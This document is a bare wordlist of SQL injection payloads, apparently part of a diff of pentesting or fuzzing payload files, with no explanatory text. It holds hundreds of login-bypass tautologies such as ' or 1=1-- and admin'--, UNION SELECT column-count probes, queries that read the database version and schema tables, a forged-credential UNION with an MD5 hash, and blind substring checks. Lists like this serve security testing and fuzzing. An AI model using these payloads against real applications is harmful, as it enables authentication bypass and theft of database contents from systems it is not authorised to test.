admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
